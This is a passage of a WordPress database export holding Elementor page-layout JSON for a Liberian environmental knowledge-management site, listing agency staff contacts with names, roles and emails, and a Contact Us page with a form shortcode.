href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"784af4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/nadine.jpg\",\"id\":5093,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine A\'jami<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34888,5098,'_elementor_pro_version','3.7.1'),(34889,5099,'_elementor_edit_mode','builder'),(34890,5099,'_elementor_template_type','wp-page'),(34891,5099,'_elementor_version','3.6.6'),(34892,5099,'_wp_page_template','default'),(34893,5099,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and 